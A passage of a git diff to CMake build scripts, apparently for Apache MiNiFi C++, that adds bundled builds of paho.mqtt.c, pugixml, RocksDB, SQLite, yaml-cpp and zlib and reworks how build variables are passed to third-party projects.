-    set(EXPORTED_MBEDX509_LIBRARY "${MBEDX509_LIBRARY}" CACHE STRING "" FORCE)
-    set(EXPORTED_MBEDCRYPTO_LIBRARY "${MBEDCRYPTO_LIBRARY}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_MBEDTLS_LIBRARIES=${MBEDTLS_LIBRARIES_EXPORT}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_MBEDTLS_LIBRARY=${MBEDTLS_LIBRARY}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_MBEDX509_LIBRARY=${MBEDX509_LIBRARY}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_MBEDCRYPTO_LIBRARY=${MBEDCRYPTO_LIBRARY}" CACHE STRING "" FORCE)
 
     # Create imported targets
     file(MAKE_DIRECTORY ${MBEDTLS_INCLUDE_DIRS})
diff --git a/cmake/BundledOSSPUUID.cmake b/cmake/BundledOSSPUUID.cmake
index 723633d..61c02dc 100644
--- a/cmake/BundledOSSPUUID.cmake
+++ b/cmake/BundledOSSPUUID.cmake
@@ -21,7 +21,6 @@
     message("Using bundled ossp-uuid")
 
     # Define patch step
-    find_package(Patch REQUIRED)
     set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/ossp-uuid/ossp-uuid-mac-fix.patch")
 
     # Define byproducts
diff --git a/cmake/BundledOpen62541.cmake b/cmake/BundledOpen62541.cmake
index b4fb2de..663d831 100644
--- a/cmake/BundledOpen62541.cmake
+++ b/cmake/BundledOpen62541.cmake
@@ -16,9 +16,6 @@
 # under the License.
 
 function(use_bundled_open62541 SOURCE_DIR BINARY_DIR)
-    # Find patch executable
-    find_package(Patch REQUIRED)
-
     # Define patch step
     set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/open62541/open62541.patch")
 
@@ -41,13 +38,9 @@
     set(OPEN62541_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
             "-DCMAKE_INSTALL_PREFIX=${OPEN62541_BYPRODUCT_DIR}"
             -DOPEN62541_VERSION=v1.0
-            -DUA_ENABLE_ENCRYPTION=ON
-            "-DCMAKE_MODULE_PATH=${CMAKE_SOURCE_DIR}/cmake/mbedtls/dummy"
-            "-DEXPORTED_MBEDTLS_INCLUDE_DIRS=${EXPORTED_MBEDTLS_INCLUDE_DIRS}"
-            "-DEXPORTED_MBEDTLS_LIBRARIES=${EXPORTED_MBEDTLS_LIBRARIES}"
-            "-DEXPORTED_MBEDTLS_LIBRARY=${EXPORTED_MBEDTLS_LIBRARY}"
-            "-DEXPORTED_MBEDX509_LIBRARY=${EXPORTED_MBEDX509_LIBRARY}"
-            "-DEXPORTED_MBEDCRYPTO_LIBRARY=${EXPORTED_MBEDCRYPTO_LIBRARY}")
+            -DUA_ENABLE_ENCRYPTION=ON)
+
+    append_third_party_passthrough_args(OPEN62541_CMAKE_ARGS "${OPEN62541_CMAKE_ARGS}")
 
     # Build project
     ExternalProject_Add(
diff --git a/cmake/BundledPahoMqttC.cmake b/cmake/BundledPahoMqttC.cmake
new file mode 100644
index 0000000..fd707e8
--- /dev/null
+++ b/cmake/BundledPahoMqttC.cmake
@@ -0,0 +1,81 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_pahomqttc SOURCE_DIR BINARY_DIR)
+    # Define the patch step: apply MiNiFi's local patch to the paho.mqtt.c sources before configuring
+    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/paho.mqtt.c/paho.mqtt.c.patch")
+
+    # Define byproducts (the static library path differs between Windows and the unix lib/lib64 layouts)
+    get_property(LIB64 GLOBAL PROPERTY FIND_LIBRARY_USE_LIB64_PATHS)
+    if ("${LIB64}" STREQUAL "TRUE" AND (NOT WIN32 AND NOT APPLE))
+        set(LIBSUFFIX 64)
+    endif()
+
+    if (WIN32)
+        set(BYPRODUCT "lib/libpaho-mqtt3cs-static.lib")
+    else()
+        set(BYPRODUCT "lib${LIBSUFFIX}/libpaho-mqtt3cs-static.a")
+    endif()
+
+    # Set build options: build only the static library, skip the Paho test suite
+    set(PAHOMQTTC_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/paho.mqtt.c-install"
+            -DCMAKE_POSITION_INDEPENDENT_CODE=ON
+            -DPAHO_BUILD_STATIC=TRUE
+            -DPAHO_ENABLE_TESTING=FALSE)
+    if (OPENSSL_OFF)
+        list(APPEND PAHOMQTTC_CMAKE_ARGS -DPAHO_WITH_SSL=FALSE)
+    else()
+        list(APPEND PAHOMQTTC_CMAKE_ARGS -DPAHO_WITH_SSL=TRUE)
+    endif()
+
+    append_third_party_passthrough_args(PAHOMQTTC_CMAKE_ARGS "${PAHOMQTTC_CMAKE_ARGS}")
+
+    # Build project as an external CMake project, pinned to an exact upstream commit
+    ExternalProject_Add(
+            paho.mqtt.c-external
+            GIT_REPOSITORY "https://github.com/eclipse/paho.mqtt.c.git"
+            GIT_TAG "6aa07f575bc9369402b1b252fd280373f8d585ef" # This is not a tagged/released version, but the exact one that was in our repo.
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/paho.mqtt.c-src"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${PAHOMQTTC_CMAKE_ARGS}
+            PATCH_COMMAND ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/paho.mqtt.c-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set dependencies: when SSL is enabled, the bundled OpenSSL targets must be built first
+    if (NOT OPENSSL_OFF)
+        add_dependencies(paho.mqtt.c-external OpenSSL::SSL OpenSSL::Crypto)
+    endif()
+
+    # Set result variables in the cache so callers and sibling modules can consume them
+    set(PAHOMQTTC_FOUND "YES" CACHE STRING "" FORCE)
+    set(PAHOMQTTC_INCLUDE_DIR "${BINARY_DIR}/thirdparty/paho.mqtt.c-install/include" CACHE STRING "" FORCE)
+    set(PAHOMQTTC_LIBRARY "${BINARY_DIR}/thirdparty/paho.mqtt.c-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(PAHOMQTTC_LIBRARIES ${PAHOMQTTC_LIBRARY} CACHE STRING "" FORCE)
+
+    # Create an imported target wrapping the static library built above
+    add_library(paho.mqtt.c STATIC IMPORTED)
+    set_target_properties(paho.mqtt.c PROPERTIES IMPORTED_LOCATION "${PAHOMQTTC_LIBRARY}")
+    add_dependencies(paho.mqtt.c paho.mqtt.c-external)
+    file(MAKE_DIRECTORY ${PAHOMQTTC_INCLUDE_DIR})
+    set_property(TARGET paho.mqtt.c APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${PAHOMQTTC_INCLUDE_DIR})
+    if (NOT OPENSSL_OFF)
+        set_property(TARGET paho.mqtt.c APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::SSL OpenSSL::Crypto)
+    endif()
+endfunction(use_bundled_pahomqttc)
diff --git a/cmake/BundledPugiXml.cmake b/cmake/BundledPugiXml.cmake
new file mode 100644
index 0000000..ef97bf0
--- /dev/null
+++ b/cmake/BundledPugiXml.cmake
@@ -0,0 +1,57 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_pugixml SOURCE_DIR BINARY_DIR)
+    # Define byproducts
+    if (WIN32)
+        set(BYPRODUCT "lib/pugixml.lib")
+    else()
+        set(BYPRODUCT "lib/libpugixml.a")
+    endif()
+
+    # Set build options
+    set(PUGI_BYPRODUCT_DIR "${BINARY_DIR}/thirdparty/pugixml-install") # use the BINARY_DIR argument, like the other bundled modules
+
+    set(PUGI_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${PUGI_BYPRODUCT_DIR}"
+            "-DBUILD_TESTS=OFF"
+            "-DBUILD_SHARED_AND_STATIC_LIBS=OFF"
+            "-DBUILD_SHARED_LIBS=OFF")
+
+    # Build project
+    ExternalProject_Add(
+            pugixml-external
+            URL "https://github.com/zeux/pugixml/releases/download/v1.9/pugixml-1.9.tar.gz"
+            URL_HASH "SHA256=d156d35b83f680e40fd6412c4455fdd03544339779134617b9b28d19e11fdba6"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/pugixml-src"
+            CMAKE_ARGS ${PUGI_CMAKE_ARGS}
+            BUILD_BYPRODUCTS "${PUGI_BYPRODUCT_DIR}/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(PUGIXML_FOUND "YES" CACHE STRING "" FORCE)
+    set(PUGIXML_INCLUDE_DIR "${PUGI_BYPRODUCT_DIR}/include" CACHE STRING "" FORCE)
+    set(PUGIXML_LIBRARY "${PUGI_BYPRODUCT_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(PUGI::libpugixml STATIC IMPORTED)
+    set_target_properties(PUGI::libpugixml PROPERTIES IMPORTED_LOCATION "${PUGIXML_LIBRARY}")
+    add_dependencies(PUGI::libpugixml pugixml-external)
+    file(MAKE_DIRECTORY ${PUGIXML_INCLUDE_DIR})
+    set_property(TARGET PUGI::libpugixml APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${PUGIXML_INCLUDE_DIR})
+endfunction(use_bundled_pugixml)
diff --git a/cmake/BundledRocksDB.cmake b/cmake/BundledRocksDB.cmake
new file mode 100644
index 0000000..509ff09
--- /dev/null
+++ b/cmake/BundledRocksDB.cmake
@@ -0,0 +1,77 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_rocksdb SOURCE_DIR BINARY_DIR)
+    message("Using bundled RocksDB")
+
+    # Define patch step
+    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/rocksdb/rocksdb-BUILD.patch")
+
+    # Define byproducts
+    get_property(LIB64 GLOBAL PROPERTY FIND_LIBRARY_USE_LIB64_PATHS)
+    if ("${LIB64}" STREQUAL "TRUE" AND (NOT WIN32 AND NOT APPLE))
+        set(LIBSUFFIX 64)
+    endif()
+
+    if (WIN32)
+        set(BYPRODUCT "lib/rocksdb.lib")
+    else()
+        set(BYPRODUCT "lib${LIBSUFFIX}/librocksdb.a")
+    endif()
+
+    # Set build options
+    set(ROCKSDB_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/rocksdb-install"
+            -DWITH_TESTS=OFF
+            -DWITH_TOOLS=OFF
+            -DFAIL_ON_WARNINGS=OFF)
+    if(PORTABLE)
+        list(APPEND ROCKSDB_CMAKE_ARGS -DPORTABLE=ON)
+    endif()
+    if(WIN32)
+        list(APPEND ROCKSDB_CMAKE_ARGS -DROCKSDB_INSTALL_ON_WINDOWS=ON)
+    endif()
+
+    # Build project
+    ExternalProject_Add(
+            rocksdb-external
+            URL "https://github.com/facebook/rocksdb/archive/rocksdb-5.8.6.tar.gz"
+            URL_HASH "SHA256=eb7d79572fff8ba60ccf1caa3b504dd1f4ac7fc864773ff056e1c3c30902508b"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/rocksdb-src"
+            CMAKE_ARGS ${ROCKSDB_CMAKE_ARGS}
+            PATCH_COMMAND ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/rocksdb-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(ROCKSDB_FOUND "YES" CACHE STRING "" FORCE)
+    set(ROCKSDB_INCLUDE_DIR "${BINARY_DIR}/thirdparty/rocksdb-install/include" CACHE STRING "" FORCE)
+    set(ROCKSDB_LIBRARY "${BINARY_DIR}/thirdparty/rocksdb-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(ROCKSDB_LIBRARIES ${ROCKSDB_LIBRARY} CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(RocksDB::RocksDB STATIC IMPORTED)
+    set_target_properties(RocksDB::RocksDB PROPERTIES IMPORTED_LOCATION "${ROCKSDB_LIBRARY}")
+    add_dependencies(RocksDB::RocksDB rocksdb-external)
+    file(MAKE_DIRECTORY ${ROCKSDB_INCLUDE_DIR})
+    set_property(TARGET RocksDB::RocksDB APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${ROCKSDB_INCLUDE_DIR})
+    set_property(TARGET RocksDB::RocksDB APPEND PROPERTY INTERFACE_LINK_LIBRARIES Threads::Threads)
+    if(WIN32)
+        set_property(TARGET RocksDB::RocksDB APPEND PROPERTY INTERFACE_LINK_LIBRARIES Rpcrt4.lib)
+    endif()
+endfunction(use_bundled_rocksdb)
diff --git a/cmake/BundledSQLite.cmake b/cmake/BundledSQLite.cmake
new file mode 100644
index 0000000..0a9e1f8
--- /dev/null
+++ b/cmake/BundledSQLite.cmake
@@ -0,0 +1,48 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_sqlite SOURCE_DIR BINARY_DIR)
+    # Define byproducts (name of the static library produced by the in-tree SQLite CMake project)
+    if (WIN32)
+        set(BYPRODUCT "libsqlite.lib")
+    else()
+        set(BYPRODUCT "libsqlite.a")
+    endif()
+
+    # Build the in-tree SQLite sources via ExternalProject; no install step, the library is consumed from the build tree
+    ExternalProject_Add(
+            sqlite-external
+            SOURCE_DIR "${SOURCE_DIR}/thirdparty/sqlite"
+            BINARY_DIR "${BINARY_DIR}/thirdparty/sqlite"
+            CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            INSTALL_COMMAND ""
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/sqlite/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set result variables; headers are taken directly from the source tree
+    set(SQLite3_FOUND "YES" CACHE STRING "" FORCE)
+    set(SQLite3_INCLUDE_DIRS "${SOURCE_DIR}/thirdparty/sqlite" CACHE STRING "" FORCE)
+    set(SQLite3_LIBRARY "${BINARY_DIR}/thirdparty/sqlite/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(SQLite3_LIBRARIES ${SQLite3_LIBRARY} CACHE STRING "" FORCE)
+
+    # Create an imported target wrapping the static library built above
+    add_library(SQLite::SQLite3 STATIC IMPORTED)
+    set_target_properties(SQLite::SQLite3 PROPERTIES IMPORTED_LOCATION "${SQLite3_LIBRARY}")
+    add_dependencies(SQLite::SQLite3 sqlite-external)
+    set_property(TARGET SQLite::SQLite3 APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${SQLite3_INCLUDE_DIRS})
+endfunction(use_bundled_sqlite)
diff --git a/cmake/BundledYamlCpp.cmake b/cmake/BundledYamlCpp.cmake
new file mode 100644
index 0000000..0c9a3f4
--- /dev/null
+++ b/cmake/BundledYamlCpp.cmake
@@ -0,0 +1,51 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_yamlcpp SOURCE_DIR BINARY_DIR)
+    # Define byproducts (static library name differs between Windows and unix)
+    if (WIN32)
+        set(BYPRODUCT "lib/libyaml-cppmd.lib")
+    else()
+        set(BYPRODUCT "lib/libyaml-cpp.a")
+    endif()
+
+    # Set build options: install into the build tree and build position-independent code
+    set(YAMLCPP_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/yaml-cpp-install"
+            -DCMAKE_POSITION_INDEPENDENT_CODE=ON)
+
+    # Build the in-tree yaml-cpp sources via ExternalProject
+    ExternalProject_Add(
+            yaml-cpp-external
+            SOURCE_DIR "${SOURCE_DIR}/thirdparty/yaml-cpp-yaml-cpp-20171024"
+            CMAKE_ARGS ${YAMLCPP_CMAKE_ARGS}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/yaml-cpp-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set result variables; headers come from the source tree, the library from the install tree
+    set(YAMLCPP_FOUND "YES" CACHE STRING "" FORCE)
+    set(YAMLCPP_INCLUDE_DIR "${SOURCE_DIR}/thirdparty/yaml-cpp-yaml-cpp-20171024/include" CACHE STRING "" FORCE)
+    set(YAMLCPP_LIBRARY "${BINARY_DIR}/thirdparty/yaml-cpp-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(YAMLCPP_LIBRARIES ${YAMLCPP_LIBRARY} CACHE STRING "" FORCE)
+
+    # Create an imported target wrapping the static library built above
+    add_library(yaml-cpp STATIC IMPORTED)
+    set_target_properties(yaml-cpp PROPERTIES IMPORTED_LOCATION "${YAMLCPP_LIBRARY}")
+    add_dependencies(yaml-cpp yaml-cpp-external)
+    set_property(TARGET yaml-cpp APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${YAMLCPP_INCLUDE_DIR})
+endfunction(use_bundled_yamlcpp)
diff --git a/cmake/BundledZLIB.cmake b/cmake/BundledZLIB.cmake
new file mode 100644
index 0000000..8d2d354
--- /dev/null
+++ b/cmake/BundledZLIB.cmake
@@ -0,0 +1,73 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_zlib SOURCE_DIR BINARY_DIR)
+    message("Using bundled zlib")
+
+    # Define byproducts
+    if (WIN32)
+        string(TOLOWER "${CMAKE_BUILD_TYPE}" build_type)
+        if (build_type MATCHES relwithdebinfo OR build_type MATCHES release)
+            set(BYPRODUCT "lib/zlibstatic.lib")
+        else()
+            set(BYPRODUCT "lib/zlibstaticd.lib")
+        endif()
+    else()
+        set(BYPRODUCT "lib/libz.a")
+    endif()
+
+    # Set build options
+    set(ZLIB_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/zlib-install"
+            )
+
+    # Build project
+    ExternalProject_Add(
+        zlib-external
+        URL "https://github.com/madler/zlib/archive/v1.2.11.tar.gz"
+        URL_HASH "SHA256=629380c90a77b964d896ed37163f5c3a34f6e6d897311f1df2a7016355c45eff"
+        SOURCE_DIR "${BINARY_DIR}/thirdparty/zlib-src"
+        CMAKE_ARGS ${ZLIB_CMAKE_ARGS}
+        BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/zlib-install/${BYPRODUCT}"
+        EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(ZLIB_FOUND "YES" CACHE STRING "" FORCE)
+    set(ZLIB_INCLUDE_DIRS "${BINARY_DIR}/thirdparty/zlib-install/include" CACHE STRING "" FORCE)
+    set(ZLIB_LIBRARIES "${BINARY_DIR}/thirdparty/zlib-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(ZLIB_VERSION_STRING "1.2.11" CACHE STRING "" FORCE)
+    set(ZLIB_VERSION_MAJOR 1 CACHE STRING "" FORCE)
+    set(ZLIB_VERSION_MINOR 2 CACHE STRING "" FORCE)
+    set(ZLIB_VERSION_PATCH 11 CACHE STRING "" FORCE)
+
+    # Set exported variables for FindPackage.cmake
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_INCLUDE_DIRS=${ZLIB_INCLUDE_DIRS}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_LIBRARIES=${ZLIB_LIBRARIES}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_VERSION_STRING=${ZLIB_VERSION_STRING}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_VERSION_MAJOR=${ZLIB_VERSION_MAJOR}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_VERSION_MINOR=${ZLIB_VERSION_MINOR}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_VERSION_PATCH=${ZLIB_VERSION_PATCH}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    # Pre-create the include dir so INTERFACE_INCLUDE_DIRECTORIES validation passes before the external project installs
+    file(MAKE_DIRECTORY ${ZLIB_INCLUDE_DIRS})
+
+    add_library(ZLIB::ZLIB STATIC IMPORTED)
+    set_target_properties(ZLIB::ZLIB PROPERTIES IMPORTED_LOCATION "${ZLIB_LIBRARIES}")
+    add_dependencies(ZLIB::ZLIB zlib-external)
+    set_property(TARGET ZLIB::ZLIB APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${ZLIB_INCLUDE_DIRS})
+endfunction(use_bundled_zlib)
diff --git a/cmake/Compression.cmake b/cmake/Compression.cmake
deleted file mode 100644
index 498b974..0000000
--- a/cmake/Compression.cmake
+++ /dev/null
@@ -1,58 +0,0 @@
-# Licensed to the Apache Software Foundation (ASF) under one
-# or more contributor license agreements.  See the NOTICE file
-# distributed with this work for additional information
-# regarding copyright ownership.  The ASF licenses this file
-# to you under the Apache License, Version 2.0 (the
-# "License"); you may not use this file except in compliance
-# with the License.  You may obtain a copy of the License at
-#
-#   http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing,
-# software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
-# KIND, either express or implied.  See the License for the
-# specific language governing permissions and limitations
-# under the License.
-
-function(use_bundled_zlib SOURCE_DIR BINARY_DIR)
- message("Using bundled zlib")
-if (WIN32)
- string(TOLOWER "${CMAKE_BUILD_TYPE}" build_type)
- if (build_type MATCHES relwithdebinfo OR build_type MATCHES release)
- set(BYPRODUCT "thirdparty/zlib-install/lib/zlibstatic.lib")
- else()
- set(BYPRODUCT "thirdparty/zlib-install/lib/zlibstaticd.lib")
- endif()
- else()
- set(BYPRODUCT "thirdparty/zlib-install/lib/libz.a")
- endif()
-  ExternalProject_Add(
-    zlib-external
-    GIT_REPOSITORY "https://github.com/madler/zlib.git"
-    GIT_TAG "cacf7f1d4e3d44d871b605da3b647f07d718623f"  # Version 1.2.11
-    SOURCE_DIR "${BINARY_DIR}/thirdparty/zlib-src"
-    CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-               "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/zlib-install"
-    BUILD_BYPRODUCTS ${BYPRODUCT}
-  )
-
-
-  add_library(z STATIC IMPORTED)
-  set_target_properties(z PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/${BYPRODUCT}")
-
-  set(ZLIB_BYPRODUCT "${BINARY_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)
-  set(ZLIB_BYPRODUCT_INCLUDE "${SOURCE_DIR}/thirdparty/zlib/include" CACHE STRING "" FORCE)
-  set(ZLIB_BIN_DIR "${BINARY_DIR}/thirdparty/libressl-install/" CACHE STRING "" FORCE)
-
-  add_dependencies(z zlib-external)
-  set(ZLIB_FOUND "YES" CACHE STRING "" FORCE)
-  set(ZLIB_INCLUDE_DIR "${SOURCE_DIR}/thirdparty/zlib/include" CACHE STRING "" FORCE)
-  set(ZLIB_INCLUDE_DIRS "${SOURCE_DIR}/thirdparty/zlib/include" CACHE STRING "" FORCE)
-
-  set(ZLIB_LIBRARY "${BINARY_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARIES "${ZLIB_LIBRARY}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARY_RELEASE "${BINARY_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARY_DEBUG "${BINARY_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)  
-  
-endfunction(use_bundled_zlib)
\ No newline at end of file
diff --git a/cmake/Extensions.cmake b/cmake/Extensions.cmake
index 438a783..1c7422b 100644
--- a/cmake/Extensions.cmake
+++ b/cmake/Extensions.cmake
@@ -91,7 +91,7 @@
             PREFIX ${prefix}/${target}
             GIT_REPOSITORY ${repourl}
         	GIT_TAG ${repotag}
-            CMAKE_ARGS ${ARGN}
+            CMAKE_ARGS \"${ARGN}\"
             INSTALL_COMMAND \"\"
             )
          add_custom_target(exec_${target})
@@ -100,11 +100,27 @@
 
 	file(WRITE ${exec_dir}/CMakeLists.txt "${CMAKE_LIST_CONTENT}")
 
+	# Try to determine the number of CPUs and do a parallel build based on that
+	include(ProcessorCount OPTIONAL RESULT_VARIABLE PROCESSCOUNT_RESULT)
+	if(PROCESSCOUNT_RESULT) # include() sets this to the module path on success, NOTFOUND otherwise
+		ProcessorCount(NUM_CPU)
+		math(EXPR PARALLELISM "${NUM_CPU} / 2")
+	endif()
+	if(NOT PARALLELISM OR PARALLELISM LESS 1)
+		set(PARALLELISM 1)
+	endif()
+
+	message("Building ${target} with a parallelism of ${PARALLELISM}")
 	execute_process(COMMAND ${CMAKE_COMMAND} ..
 			WORKING_DIRECTORY ${exec_dir}/build
 			)
-	execute_process(COMMAND ${CMAKE_COMMAND} --build .
-			WORKING_DIRECTORY ${exec_dir}/build
-			)
-
+	if(${CMAKE_VERSION} VERSION_EQUAL "3.12.0" OR ${CMAKE_VERSION} VERSION_GREATER "3.12.0")
+		execute_process(COMMAND ${CMAKE_COMMAND} --build . --parallel ${PARALLELISM}
+				WORKING_DIRECTORY ${exec_dir}/build
+				)
+	else()
+		execute_process(COMMAND ${CMAKE_COMMAND} --build .
+				WORKING_DIRECTORY ${exec_dir}/build
+				)
+	endif()
 endfunction()
diff --git a/cmake/FindRocksDB.cmake b/cmake/FindRocksDB.cmake
deleted file mode 100644
index db9c2d1..0000000
--- a/cmake/FindRocksDB.cmake
+++ /dev/null
@@ -1,51 +0,0 @@
-# Licensed to the Apache Software Foundation (ASF) under one
-# or more contributor license agreements.  See the NOTICE file
-# distributed with this work for additional information
-# regarding copyright ownership.  The ASF licenses this file
-# to you under the Apache License, Version 2.0 (the
-# "License"); you may not use this file except in compliance
-# with the License.  You may obtain a copy of the License at
-# 
-#   http://www.apache.org/licenses/LICENSE-2.0
